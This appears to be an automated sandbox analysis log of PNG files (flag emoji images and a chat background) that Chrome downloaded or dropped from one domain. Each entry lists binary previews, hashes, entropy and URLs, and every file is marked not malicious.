                                  Preview:.PNG........IHDR.....................PLTEGpL..F..G..J..S.![.$`.&g.&i.(i.)k.*l.+l.,m.-p./p.1s.3u.4w.5y.7y.8{.:}.<~.>..?..@..B..C.!D.#F.$H.&I.%H.Wu.oS3VTT.[..n..f..z)....z R.0_.%dj.JV...>.."..Z.}nhnXcv.k}.gx._q.Vm.Hc.?].8V.0Q.)M.)M.(L.(L.(K.(K.(J.%F.#C~"@x <r.8i.3c.,U.(N.$I.#F.!D. C.!D..B..A..C.$G..B./:.px.........ow.ks.]g.Q].KX.AN.7E.. ..'..).....!.&7...LV..-.......qz.z..............q|.zz.o~.W_|o..gw.iy._o.br.ip.fv.6Fg..B..<..?..E."N.'X.+b./k..$..$..)...................._ E..mx...>]n.;HhW=<.4J......v..u..s....7.(3.Z_..................................`l.GV....R`..?O.2C.+<./?.(9.&7.!2............................/@.6F.9I|Eo.M..;.s..x..y........ar.dt.\m.Pe.Ui.J`.AX.1K}3O.+Fy<Qz&K.....y.....{..z...............g..El..y...v..}..y&../..9..,..\iyZ_i9..'-.2Xl.FI.2]."f./s.<z.7v.8t.6o.3h.0^.0\oJ......tRNS.~.............................................................................uR-.@...X.*........................~.V/...gA.........................~.....~~~..................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5345
                                  Entropy (8bit):7.94153249145176
                                  Encrypted:false
                                  SSDEEP:96:3dKmwDAmTQ13VRI0VYy/40sgJ0ZZCHmc6H/RmL4nRy8IfI4F+JZqTUXS:HmT0VYQ40Eut6ZmwNIkJZOx
                                  MD5:29FCA84D679A698BEA04DC37B8E7A3C2
                                  SHA1:39FAAB00B2796D383E736B2765EA3E02182E2F3A
                                  SHA-256:2DB133AC9CB87B81981F0B4DBFBE8D98729884C4D93DEEB1F487A84151C7F289
                                  SHA-512:FD83C37BC90757B19778D3F7F7530744F7CDA848D7784ECDE13614F2F00826394B773BDFB92CC22A327FDBD570B1571ECB1EE0EDD4EC6CC086018EEE4C35F1F0
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.Y[j.....l.....m.....j....................k.....w.......m..........k........m.....h..z8.......n.....o...........g.................................................................................................2................................................................0...............................0........................../................3...................*.0......{...........|/....jq..#..-.os.m..]c.lp.af.V\....\a.dg.Q,.LS.a&.?B.LQ.%/.A@.05.%/.5;}_..%.. *.%/.&..%..!+.$-.%..!*."+.%-..$.!*.*1.&...(.#+.16..%.D!..&..(.%-.(/.....$..&.#*..".&,..'..-.......$+..........."..%....%+..-..............".......$*............................!&v&)................................._$'............K&'w........r..;&&v..~..&&&k...&%.!!d...&%.$#.. .. ....)tRNS.....!08HQ`cccfhw}~~.....................c.~....gIDATx..[l..y......M..(.e7.a;N..NRI.......N..O}.[^.Z.....<....C....um.i-.r..N..H.L.")..%.\....9.W..Y-....L............
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5812
                                  Entropy (8bit):7.94369332180426
                                  Encrypted:false
                                  SSDEEP:96:D8S3eG9ZCRmeF8MTtgByDnBYICB8YC8n/n/h3v4f+HyRdr5G1FvHlv:D8TWZIFByWYIB8nv/5Hq5Ix
                                  MD5:9BF8A9DED8E624151AA9969C07B20368
                                  SHA1:5D27DBB2DB6AAD017CB62B43F1E7CD13BCA7ECE4
                                  SHA-256:7FBCFF19B9F5B85566103B7F16DEE1B821B4C1B59E7ACC252F69F45C7C0A0338
                                  SHA-512:9499A5F9F380490210F65F0ABCCEA18C165F60CE8F2A336AE78E09621D01BFF00D557D86584FDC8272110F118E21294F3F25122018473A4B699A90185AD54615
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..O..9]]...>lk.ee...9..8.#.gg...3........8..C.....<..7gg.e_...=..7cc.ng......9^^.jj...8....fn.HHfd..^m...JJs.z....&&}$$z&%|..T..f""y%%z..X!!w..]..u.....V..b..P..M..[.....i..o..`..t..e..k..m....&%..a..d.....r..E..^..Y.....X.....r..0..9.....B..........""........<.......r...j...$$v..g....1...=.....O..7.._ii....""p**zWW...m..A......DDy..K......55s))n...11....QQ}.....H....0/.....X.L..i".....a..Z...................@L...CC.JJ..CC...ba.ON.88..G.....}............g...C...............R..c....'+ee..dc.33>>~......{|.....Z.....:........0.....,0...S%............1.'...........#.ZXqq..==......wA.@C1.ML.A.......TVO.xx.........}%XX.....KK....""._^.rr.....}...;;p8X..ll...U...y.JX...57.Yh...l-..%..rw.UTjhg00e`b.I......S%.d....jt....".....Z.Z.n=^...&....)rQ..th.NZ..Ul...h....'tRNS.c~..9......~....k.UO1.h....@...$.e{..d......<IDATx...iP.Y....h.]L.Uz......&..FT.k.K. [.r.b....B... $.`...b.J..K4!,a..Y.E.A`h.F.G.}.^f.9..4[...|.bi...sr.{..Yi..VZi..VZi..V
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 1123 x 2307, 4-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):272875
                                  Entropy (8bit):7.99602590670526
                                  Encrypted:true
                                  SSDEEP:6144:rNYvpliapP4LNqNMaT3SU4+hRT2ieSaVTrewN69j+YOnZmDXxGjuC1:rNCpb+L7aum2Bt6hr/C
                                  MD5:3D558D8DE7082A2B2355076C8988C3FD
                                  SHA1:D74980E29B0EC2F102B0DCD614503FD42A255B85
                                  SHA-256:00745DB819D91C37BF0F59BEE00AB2EFE9766FDDCB726FF1BCB6847748B2BBC7
                                  SHA-512:5F6F62EBA34A80EFD63EC237536A288DACB799B1270D07F82B82F0EE280923349105ACFAB71333361FF3EFDF64708CD682F89AC2831DC02D0D7357BB5C4C3926
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/chat-bg-pattern-light.ee148af944f6580293ae.png
                                  Preview:.PNG........IHDR...c.........P......*PLTE..........................................b.+`....tRNS......"'.8?FM.."....)bIDATx..[.o#..l.3....I^&.1$..L9..,.e%/o4>...+e...H.c.I.p4=R&1..E.2....T...nW'..e7..z.....H..Y...,.....i!..]0Z.~..h...U........b.6U...0.%#...GF...GR....b.../.a..5.m......E.H.'.....>.=......U.l.........7a.E~E.J.%.....]0Y.~1.O...b...y<..n@...b...*q.$.7..q.O..."V.?....+.0.#%...;.4.Jzq.......E?zD..W..>1gY.?...nL.....gb0....E.1j...1.%.b.x.~.:..d.=...hT.....P..B.L.>....b?k'rvc......8....S6..6.7E..1..fo....cF.IO..o.....-......u.3S.2S$...{..GM.=..3../.}%..1q..#..59..FZi........!r..rr...Y....C~(..I1.SF..IC.i=l......... ..1.a....>.....0..K....I!...bQt...p....S...z....8DF..K.sVn..K.CAb*.U.#..P.R.{.7D&k..b.U.d/..cR.e........I....\..=i..g'...U-...R..l5YZ...".&........9......'..?29....4....xUd..._.......y.+.m....}..Q.l?..7e..h...x.h...k/.!...z..._...[OK,../t.............C..Pf..!t..d...."..!..\z.Rm. H.q.)....j...X.1.)CHJxY...4.......-X.o.M
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4563
                                  Entropy (8bit):7.905573676580304
                                  Encrypted:false
                                  SSDEEP:48:hb3lsncI2MdqYplplVW0uy70UiECx7/vOZeU74SFsmtj9rfNoi7kCloiCBZx7EIw:B3ljIhdnnVW0umHCIp5QCO70kky+e4
                                  MD5:0B9E4EA86246BA5B357DC9A5C71C4F0A
                                  SHA1:912BBF82DAB40CC265AF6D677A91F64838175CF6
                                  SHA-256:C47B3E484B25B1E3A188EB95910471183C522D87AA20A55A940CED0099E24E15
                                  SHA-512:EC3C85AC7ADDC1A36CAECF75A4E0D8F5C438776B148F5F155E3DC137D9E5C8D01F5449714B85C30344FFBDFB8DF99F3F1D15E39D48A0DBFB99B2BAF9C18C3AC3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.[Yz.....z........|........{..}.............../....|.....^g.............{.....}.....~..z........w....................v..........................................................................................................................................................................................y...........C.wi......y...l...[`_w.s|.Ou.Pi../&..%.-$Ae..,..-$Xh..*!.-%.1@.)..) .(..) .&..8_.$..(!."..".....:..' 4W..!.......?U.n?..%..........OC..........."..'S&L....%L./J.%K.-o....M....#I..O.......!G.......E....'F.j...D...............79..A.X/..F......7....?..............M.=..>....m"r.;...E+..9..=..7.......6..6........5..3.......2..2.o.Z.2.....0.+$.....0.....-..0....H......,....&..*..*..(....)..(.|...'..'..'....%.....$.v...... ..........j{.....gtRNS.....%$16A@ORYcccdhnp~~~......................................................................................IDATx.._.\.].?..wg.c.w.Y;$$m.'..BJ Q.B..Q...Q...........K.H..R..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5814
                                  Entropy (8bit):7.944946438244119
                                  Encrypted:false
                                  SSDEEP:96:sNTWvRPd2XgA7cMk8Qbg7owfyjCjQv+dPfNmokziBbEngbvRm7xb80Yzjs:qAd2XgokRbg7owqjCjkAPYpiBAnzdYY
                                  MD5:6C5D185BA5D1F0F359CA28468BC0AC57
                                  SHA1:B9833F9A89ABDCC89931B2AAE4B28C001A5B01FF
                                  SHA-256:C67035C3351B1D734157BD45CE85F51C1B5CA8B6FFA213DBDC896D72E9D57A8D
                                  SHA-512:F3DEB0D44FE5BF448F0275042B877FF4CC2A81256D413F60E96A05B8F1EBCB11B0A1686EF4F8AD6BDE3B1E4D1E3E5DADED36F3332D01AFCF84C4EF27B142C910
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..L..7hd...;sg.VQvqk...?..5..6IDj..5.......0..5..5..8og....if...:if...6..6..5la.mj.uh..hi.KKkd........foMJr[X..}.....%.{<P2&w..O..P1&v."s1%u..Q..U, q..].....W..M*.o/$t(.m.._..S.&%..b..Y........>#.h..v""z&%|..S.....9..D....""..J(.m..?.....b..7..\..-..5..f..J.......................E..S...........m..F..r.0/..R!.R........0...**x..d..J.........44..........ww..&).33....A@...................)...........bb......!<..=<'%w__......."!12T...jfa..Y....LH.....C......ZH.....G.........q....f^X.vm].tt.....w... ".K.vxv..+E-.$^y.67od.|t#W<....D.......S..] .`US......]......."q.zR..Y-P:.7..l.....:n.........]........t...vIEv;4t*!hb_.@9kSNx.ZW(.bA:z3+h3$clj.KG.C?.QN....XW.$.[XS......-"p7-w..V..[.wv.....c!.f....ec.....` .Z.....Z.JJ_[......_..&.k%.i .^....RO1%t.....M..^...*tRNS.c~....8......~./f.f..O.v@S.|..$e..{.....t.W...;IDATx^...N.@..a..{.`cB...."...d.{O/......+..,.7..~..Y[..!..B.!..B.mj.i...!.a.....J..7...P.+pm...Q.OX..*...Tl8.x.LK_..t..e..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5123
                                  Entropy (8bit):7.909914553695886
                                  Encrypted:false
                                  SSDEEP:96:uGKEKAD2MSvrrl/qilnHmsV5Rq3zn9uzUGXV3XdHf3wKp+SF:uGKERDPmrpCilnHmce3znElRZf3JF
                                  MD5:CCB3727FC395A3036F08DD529CB4E454
                                  SHA1:C18FD097A4F55271D795529D44D3EB01DDF0BF83
                                  SHA-256:D6153205A96FB40578D1A36F7D52B7E0A5D80457F65DB58EB659BD892BCBE96D
                                  SHA-512:AC0B6E7A9B1C59468E2FD7FB4F194BC849F304978098382E1C10133B5D5CF3360E8E5B690FA7F9235B07F72DA77A00C8FE108B6C7FA805B03D9036F6E2992717
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1eb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLs#,.ow.=Ef...pyh. .ktj.".r{k.".......$/.iq.IRe......,6q...gn.s|h. f...em.rzf...]f.ksg...pxf...r{_...KT......................................................................................................................................................................................................y...............i.......U...F..........8..-..........%........................{....~........z.s...iv.ry....nt.lu.\i.gpb...gp._j.al.ks.Xd.[g.bj.N\Uy..R_.Xb.[d.GV.KX.U_.NZ.BQ.?O.CRFn..OY.<L.JU.9J.;L.9I.BP.7I.7I.<L.3D.5G.6G.4E.CO.1B.3D.:H.->.1C.5D.<I7c../A.,>./@.,>.2A.,=.*<.2@.(:.#6.<F.*;.&8.-<.$5)W..%6. 3.%5.&6.,9.!3.1<.!2..1.&4.7?!Q.../../..+..-.%3..,.'3..-..*..).J...'.#/..-..&..&..$.."..%."-..(.."| *..'..... ..#y.&r.'...n.#w..g..v..o..e..^..#.......tRNS....+->DN[_bbbllq~.~.................................................................................................................................0:.....IDATx...A..6...|..l9.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4321
                                  Entropy (8bit):7.887516336348053
                                  Encrypted:false
                                  SSDEEP:96:cZjr49QCvoqZ6w15yHCryYY1lCRxxp3/H2zSGR3YKL:KFy5GCrn64Rndf2z9JL
                                  MD5:066513B5648E745587265D7C0EE92AAE
                                  SHA1:48E75035D4E204289FB2C5CF40A8EB7AE12684F6
                                  SHA-256:EE4723AE96A4C35C45EA71FCA62E68188E2985AA2E000CDEB522FE40D9B16775
                                  SHA-512:4F335200B29EB9BE3696226E70323CC239609949C1BA5D4FE7850345A7A9181FF269B72918D3B39DC4AE3C907345114E2DC728B0A98464B41AF98A9455FD9278
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.eqc...Ua\...Xdg...T`.Wd\....<x.U.y..iyi...Vb_...Yf......_...Yf...i...Q].^kb...R^.Wdj...Xe`...Yfk..[...]j.O[.R_..c.._..c.._..M..T..[..L..^..^..]..R..\..K..Y..D..V..f..T..P..p..=..N..K..5..v..H..E..Z..D....r..A..F..-..@..>..J.1..<...:.;.8.8...E..O..ij...A..\K..k..N..h....2a....GX..M..^..b..q.t6..C..;...<1..M..W..^....=6.....&..&..%..%..)..@..$..$..Y.."..$..3..%.....H.."..%.."..J.. .....#..N........7.....$.....,.....N..<........... .........B=........e.g*..3..............*........>........+................................~u;......2..............................................................sg2.......~..y..v.b[3.y..q..m|.q..hw.l~.es.an.^k._n.ZgJE+8GI.Yg.Uc.R_.MZ.DM45..18$$#."# .........................................................................&tRNS....%.8@PTcccceesx{~..................[A....jIDATx......]...y.=....Nb.6-.*W......E......".......w....n@*..UB.(U.A..B...iID.IZ.....vwv.~.|O..'.3...'...V...W...s......k+f<....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5826
                                  Entropy (8bit):7.950300772943556
                                  Encrypted:false
                                  SSDEEP:96:bYs5UsZSrwTQocg02n0H3kgITnV9n3rU4nuR+zhofFbDJt0kxC3XnYWBJ:bYs5UuSmQo50HUzV93X8+mFzbC3zX
                                  MD5:4D6FD3605505511FF3CE70FD8BB8C45E
                                  SHA1:9D4B9BD3F4BB23CA9015516E39CED01EC68CE958
                                  SHA-256:CD0711EC0167657CECDB806E72B316F402D829F9E31A5E6C3FCB4855CBCE1F8D
                                  SHA-512:3CBFBCBDFB5721B94773B796EAC60E327BEF764AA51D95C234B5F2A8595451358538762D5ADA7D775C801B4287BA0AFE56B4317FBAC2504BAEDA44BFB89FE396
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL5^Ik.~.:$b.wc.w.;%.<&^.r.9#i.}i.}.:$.;%].q.S6n...?(d.x.4.-dIR}if.z.K2.< b.vn...;%j.~=kT.9$i.}b.wT~i.<&h.|.7!m..a.u.<%k..f.z.A+.7!1bJm..^.s.A+.3...................................................................}..w..s..n..i..d..n..`.~\.~k..i.}W.yf.{R.ua.wZ.t_.uL.p].rS.pH.lX.oS.nJ.jV.mA.hJ.hS~i<.d@.dG.d7.`L{d8._<._C{`3.\Ew_2.Z7|Z,.W9xY-~V).V).U(.V(.U).V.|U(.T)~U(~U'~S(}T?pX(|S&}R8sV'{R%|Q%{Q#{P$zO+vQ&xP#yN.rQ.zM"xM!wM vL!uL,oN6iP#sL.wJ.uJ.tJ.sI"pJ)lK.sG.uG.rG.qF!mH.pF.sD.oE.oD.nC.jE.mC.mB.pA.lB fD.lA.kA%bD.k@.j@.n?.j?.g@.h@.i?.f@.g?.i>.l<.h>.g=.c>.i;.g<.f<.a=.^?.d<.e<.e;.i8.d:.c9.b9.c8.^:.a9.b7.f6.[:.Z:.a7.`7.^7.`6.`5._5.V9.d2.^5.]4.^4.\4.]3.a/.S6.\3.\2.R5.[2.Z2.[0.W2.Z0.^+.Y0.Z/.O3.Y/.S1.X..V..K1.S+.P,.F..M*.I+.C,.K&.@).F&.D%.=&.?!.=!.9".; .6..3..0..p6....TtRNS.......#%15@CSUcedfilny}~.............................................................E.....IDATx........U.U...Yyw..a..eK..........$..? ......C ..Bn!G...&.s."B..."$.1JX..=le.;.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5505
                                  Entropy (8bit):7.946868742651499
                                  Encrypted:false
                                  SSDEEP:96:Z0IjAc9fcDOxrlGYE5hYT6XPr/Y0Y6yq5LqwCQlzzLwEM/1RGT+5KUgK:Z3995hlGYEXYT6XPr/HTBqwLlbTSKTK
                                  MD5:DFFD5F9E88BD7AFEE47D8DAE4CA49D56
                                  SHA1:1BD9C1FD064F4249F6883373036D2FD642C43264
                                  SHA-256:7BD3ABE5286F53F184977D7BD0A2F83C7E04B94AB053C678A0576C72B19F8315
                                  SHA-512:51018FEA82C29C47692EC32791D42B38A1CDECE3149B7AF653C3DA0775758EE49DE45CA97F19D8663A1EB79A6E94C69841CABD60B1A02DDF6E2DB75D9E7C0E4C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..i.j".s~h..h .s|f..x|e.{e..m.i!../.|).vxa..t..o.l"u_..y.r.l$t].zc..w.o&.i!t^..t.{.l#v_...F..O..C..F..D..F..I..\..7..J..I..B..\..H..A..F..4..@..[..C..A..K..+..>..U..d..K..)..9..M..W..'.g.B.I.2.N.m.y.A.P.0.a.P.t.!.-.3.=.F.^.3.a.).H.P.V.=.6.'.Q.L.%..Z.Q.6.@._.-.P.>..,....C.S.A.A..2.A.V.~B.?.;..?..?..2.)..&.~=.|A.|F.}=.s1..S.|;..".z:.p0.zY.y9.=..1.x7./.w8....u5....qY.s5.{3..... .yB.r@....h\.....(.f3.`[.x(.k<.~&.bI.YYo.>.z(.x..UZ._;.t:.O`.u..u&.UM.q8.r..I`.p%.Fbqy&.n..Ea.S<.Fc.E`.C_.Bc.D`.D_.JO.B^.k..Ba.V/.>c.@[]x*.N9.;d.>Y~f..=Y.7b.;V.BGzb..9T.3a.I1.6Q.2\t]..-cEo/.@4.3N.9@./Z.0K./J.2="r@.-H.&Z q>.67.,G.p=.o=.*D.n<.(B.l:.%L.tC.&@.j9.h7.qB..O.#?.$?.g5."=.f4.!;..D. ;..;..:.a7..E..;..G..>.Z5.X3..e.o..j..N....$tRNS.....$/1;?MT_ccgl~..................].k.....IDATx^....0.....0..@`.*...y.H.....n[........[SL9....-.sE.u\...../u..6..`x[...(+.C.....z..:...I.1..........@,.*+...p.!..C..sV
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3949
                                  Entropy (8bit):7.8812876441430735
                                  Encrypted:false
                                  SSDEEP:96:g4vow5KlCRUbCCg731tboCPZlSDmi5nNzjHlLXCu4I9Qn6:xvxKtOCtMZlSqi5nVFWi9Q6
                                  MD5:3A9B247198C41C92284E7DB869BFE5C0
                                  SHA1:AAB02CA8C88826A42C91D13EAB33E7102AE6A0BF
                                  SHA-256:DDD0B069E2BDBDFC262D94A1DA991DECD6960F7115478308C563F39610DF6D10
                                  SHA-512:A65731F2402D2E993071B4D21A3720F1EA9141D086926CEF4734F6446FEAEB9C911BFA366C8ED1E0833CB1643D943F07EEBC41552FB479DAE68DCB8417C2E50B
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLv-'...n&!...m& ...q)#q)#......p)#...o(".......;2...p(!...p("....TO.&.z%.p........s)#......p("q*$......p)#...n'!...q*#........s+%......i".g........................................................................................................................................................................................................................................................................y............tj....um.k_.i`.nf.^R.^R.]Q.]Q.\P.\P.`V.ZN.[O.ZN.YM.cZ.XL.YM.WK.UH.VJ.UI.VK.TH.SG.SG.NA.QE.QE.TI.PD.OC.OC.MA.RG.ea.G9.L@.J>.J>.I=.NC.J@.G;.F:.G<.LB.H=.D8.D9.>1.F;.B7.A5.I?.B6.?3.@4.E;.>2.>2.<0.7).?4.=1.F<.;/.8,.<0.:/.?5.9-.9-.7,.@6.7+.7+.A8.2%.7+.9..5*.=4.4).7-.8/.+..;3.1&.80.1'.!..2*.5..-#.%..,#.,#.0)}2+y0).'.|)".&.u+%}%.q'!x".o".h..........tRNS......%%56=HTWcccfgww~~~.~..............................................................................................................)......IDATx...Mn\E.......-H$F..H. .....a.,
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5565
                                  Entropy (8bit):7.898676316077461
                                  Encrypted:false
                                  SSDEEP:96:O5wb/L+QkdExdVfc0P4jahzGOW+EVyFZ1UocCeATr1eMKSN/T7:O276QkCdG642hzT7EuGoneEReI
                                  MD5:D9DF1638DEA879AD89FD0FEC714319D7
                                  SHA1:E269D67BA96B298634FB205DD6C1B76BD7A4FF71
                                  SHA-256:62C61F1A9C076556481F1A63A5E26D2321F40BA142920865E5202E4DA2467846
                                  SHA-512:ADA45CEBFCC0FFE432A1E748D09211485D4C89AD18B3D239D418A676BE2884895459168FC73B9BD9F5B14C3B01DBFC0587E4D84C50D457E0EC7B68E499B9B96D
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..8il.VSv..7gj...8ce...;mm...9...~%/_b...7..9=0Xgj...7..;..5ac...:jm.ROs..9ac...8..4jl.:=gac...;jm...0.................................................................................................................8..........................'................n.0...................q....|...#..P..... .ku..u..E....[g~}|.`j.wl.y%.O\.l_ik..DR.l.yiQ.Q\df..<J.EP.7D^`..7F}YF.4CZ\..2A.0>.5I.;FgXRTW.WW}.G..-<.@L./@.4P.*9nV.OR|.B.MP.sK5.3V.&5.A..)9.,?JMy.=.."1FI..0Z.,J....7.BEx."3.8.m=.>B.m0`..*.2..&<=As..%..&v3.V0h..*7;~{..59tl$O.."m/.r+.04{..&Y1.N(d...~.314k<+p-1ti(.U!Vb(.*.x',z',y',x),oc$.p.#%*x%*v +{Y#._.<#(v"'r#'kB.U %s"%e.$q]..."p.!m.!_L....l..f..k..Y..i..a4.H..Q#.Y@....g..d..X..J..b..B.._..X..M..?..^..[..Y..O..:..W..E..U..P..6..I..B..3..<..9...........tRNS....!,6ALY^bblq~..........................................................................................................................p?......IDATx....oc.]...y..~H&..$.3....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4365
                                  Entropy (8bit):7.928880957753644
                                  Encrypted:false
                                  SSDEEP:96:OkUv8F2qke4TGHm4Zb26czp5kpYNzlY2/+iR6JB:OkuR96rpYNBL+C6P
                                  MD5:EE737E0DE9AFEA578DBDA2834D4CA878
                                  SHA1:55426DB9DC28BF78BFDE4D03CB33A17945E67065
                                  SHA-256:F5DDCBD93BDA7C88260BE93F87710CE94EF58B13E47E54CD7D37B189C20F14FA
                                  SHA-512:84D5AE86AFDDBE153B0415953D930065A22BD33F8DD9B69325AF919474B33787FFF73104AA584ADCB8489B4157562C32BF41E4032DD2E3CB0119874838EA25D5
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.AM...j.$...g.!...f. ...i."......m.&....w...3...f.........EQv...........h.!i.#.....g."......j.$h."...g.!......k.%...`................................................................................................................................................................................................................................................................................................}..........p.....y..b{.ez.Yr.Li.Jd.Of.ho.A_.Xe.9X.4V.:U./Q./P..P..P.-O..O.,N..N.,M.)L.*L.*L.,L.)K.%H.'I.(I.*J.%H.%G.#E. D.(G.$F."D.9L. B.'D.!B..A..@."@..?..>..<..=.$@..<..:..:..;..;..:..8..8..;..7.!;..6..5..4..5..7..3..7..3..1..0..3..7..1../..2../........3..1..3..,..+..,.....*..*..*..-...../..(..*..$..*z.,..%r.*.."..#}.%n.%t.#{..i. v..m..f..`.........)tRNS.....!+49JL__abbsr~~~~...................2.+7....IDATx..[...u..U....pWX^L.l..i&.,Y"..~0.#..(.b .. oA./..|. y.....K.+...BC.`I.-..wg..]u..Vu....{93...<?.tw.vw..T...p.+V.X.b.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3967
                                  Entropy (8bit):7.9161902528770165
                                  Encrypted:false
                                  SSDEEP:96:qWKraYRAaNkTMpTf4tmGF/kbYggPYIIj/Hd91BJPBkuu:/Y+ehpTkmGF/kbYLYIIj/Hd9PZBkV
                                  MD5:7C2E17752191464C9A0F10AD6ED4FBF5
                                  SHA1:A29809502CE3D18627EBC792093AEF7E0CC744F2
                                  SHA-256:0259029DFE895ABDC3C82B055ADBAEC2AB5BE7324067C968C9E5DE20F6757903
                                  SHA-512:0E876038F55A9218455E0B5789D9DAADA0B76E51A9043BED0B40985AD4C4484CF1FEA2309ACD5484A62ACBDE0A5D0B062806C910FA0EB0DD85E838BAA7934258
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL....iq....el....nv....mu....CM.nu........,.......3?.go......v......-7.lt.......CK.ow....el....px.......ip....7A....qy.dl.................................................................................................................................................................................~...........n..............^........Q.....I..=.....+..............................z........r}....iu.qy....mv.ks.Yf.gp.cl.fn.^h.cj|yy.Xc.Zd.Q^.]e.T_.KY.Xa.KX.ES.R\.MX.?N.DQjjj.KU.9I.CO.<J.4D.3D.3D.3C.1B.CM.0A.5Daaa.=I.0A..?.6D.,=.,=.*;.%8.=G.,<.)9.4A.0>.&7.%5.!3.)8..0."3SSS.(6. 1."2../.0:..*.!0..-...."1..+..*..+..(."...'..(FFF..!..%..#.."..*........!{#................666......~.....---w..&&&%%%$$$""" .........................................................&...*tRNS....#,7CGSU`ccccklsy~~~.........................IDATx...s#.}.......>..f....%9.J.Q.\...C..9...r.-U>.k.9$..].....\zQ.].."A...L......A...\.<..3.T......3."jjjjjjjjjjjjjjjjjj
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4545
                                  Entropy (8bit):7.932844373444874
                                  Encrypted:false
                                  SSDEEP:96:d2ZjqFWBpApOo1TBOPr0HiTUcnovgiMzPly0bunWiAbz:dWrApt1TBOT2iTBXvyAunhuz
                                  MD5:FABC39CB82F6E053EE2538E22521FB36
                                  SHA1:CB1B2FBDA46CA7A143D4E15EEE347C728DE194FD
                                  SHA-256:354D76B2F5C32F8C44DAD499E818FEE97920CAA582AF6671F7F21FBF8A6ED8F3
                                  SHA-512:37C379B300A6734E50F16BDE335631F658E7D07DE0F352B8C5915072E413E1759D32F9A071A059322CD635E9A6C205E88A635A0FA3AB9F799BD3D2F9039CD111
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fd.png
